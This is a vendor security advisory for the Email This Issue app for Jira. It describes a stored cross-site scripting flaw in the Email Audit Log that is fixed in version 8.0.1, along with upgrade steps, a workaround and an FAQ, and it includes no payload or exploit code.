Versions Compared

Old Version 8

changes.mady.by.user Alexandra Terék

Saved on

compared with

New Version 9

changes.mady.by.user Alexandra Terék

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

Security Advisory for incident SA20201.

Summary

A vulnerability has been discovered affecting the Email audit log and its items in all versions of the app.  It allows the attacker to inject a persistent cross-site scripting method, which allows the individual to exploit the vulnerability.

Advisory Release Date

2020-02-18

Affected versions

All versions before 8.0.1

Version history

Fixed version

8.0.1

Download version

Table of Contents

About the vulnerability

The vulnerability has been discovered affecting the Email audit log and its items in all versions of the app.  It allows the attacker to inject a persistent cross-site scripting method, which allows the individual to exploit the vulnerability.

The potential threat arises from expanding the Email details in the Email Audit Log and clicking on the malicious links. Therefore we recommend you take extra care opening the body of the emails and clicking the links in the Emails shown in the issue screen or in the Email Audit Log under the app's administration page until the app is updated to the latest version.

Below is an exact example with a screenshot:

...

This threat is only present in incoming emails, outgoing emails are not affected. Therefore if you are not using Email This Issue's mail handler for incoming email processing, you are safe.

Once we became aware of the vulnerability, we considered our options and fixed it immediately.

How to fix the vulnerability  

If you are using version 8.0.0 of the application

Vulnerability enhancement does not include new features and requires no further action on your part. Upgrade to 8.0.1 as usual and let us know if you notice anything unusual.

If you are using version 7.1.5 of the application

You can safely upgrade to version 8.0.1.
8.0.0 contains two major enhancements, but it does not explicitly affect current configurations.

If you are using an older version of the application

We recommend that you upgrade to the latest version, but read the release notes carefully and check your system first.

The official instructions for updating the application are available on the Atlassian support page.

Workaround

...

  1. Navigate to Email This Issue administration’s General Configuration

  2. Select „Hide” in the Email Audit Log’s dropdown menu.

Note that this workaround can be applied to versions 5.3 or higher.

As a result, no users will be able to see the Emails tab on the bottom of the issue page (hence the ability to click on any links is eliminated).
Administrator users will still be able to browse the email audit log in Email This Issue’s administration page.

If you have any questions, please raise a support request referencing „SA-20201” in the summary or send us an email to support@metainf.atlassian.net and include „SA-20201” in the subject.

FAQ

Q: Am I vulnerable if I use Jira’s internal mail handler?
A: No, you are not. You’re only affected if you are using Email This Issue’s mail handler to process incoming emails.

...

Redirect
filename
delay1
locationhttps://docs.meta-inf.hu/email-this-issue-for-jira-server-data-center/misc/security-advisories/email-this-issue-security-advisory-2020-02-18

Thank you for visiting our old product documentation site. Note that we no longer store or update our documentation here.

Please navigate to our new documentation site and update your bookmarks accordingly. If you're looking for the former content of this page, click here.